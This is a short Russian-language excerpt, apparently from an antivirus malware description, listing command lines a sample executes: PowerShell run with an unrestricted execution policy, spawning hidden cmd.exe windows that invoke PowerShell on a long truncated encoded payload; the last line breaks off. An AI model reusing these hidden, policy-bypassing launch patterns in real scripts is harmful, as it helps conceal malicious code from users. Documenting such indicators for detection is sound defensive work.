Техническая информация
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $wXNs = 'AAAAAAAAAAAAAAAAAAAAAIQkUNp2N7TGxiFjYlsabxNWbUGMQOxzlTPl5sPN6WCgVeiFd2kvWiPt7...' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe $wXNs = 'AAAAAAAAAAAAAAAAAAAAAIQkUNp2N7TGxiFjYlsabxNWbUGMQOxzlTPl5sPN6WCgVeiFd2kvWiPt7xZNf5sqFcuvKmT6ZtReJ95XgVZZx22uQ2huTOS/+Ni8Gwlxdrz7qjuPeKXSzHqhYyBVm4kdK0RPntSXSQAogjTrMY...' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c powershell.exe $wXNs = 'AAAAAAAAAAAAAAAAAAAAAIQkUNp2N7TGxiFjYlsabxNWbUGMQOxzlTPl5sPN6WCgVeiFd2kvWiPt7xZNf5sqFcuvKmT6ZtReJ95XgVZZx22uQ2huTOS/+Ni8Gwlxdrz7qjuPeKXSzHqhYyBVm4kdK0RPntSXSQAogjTrMY...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -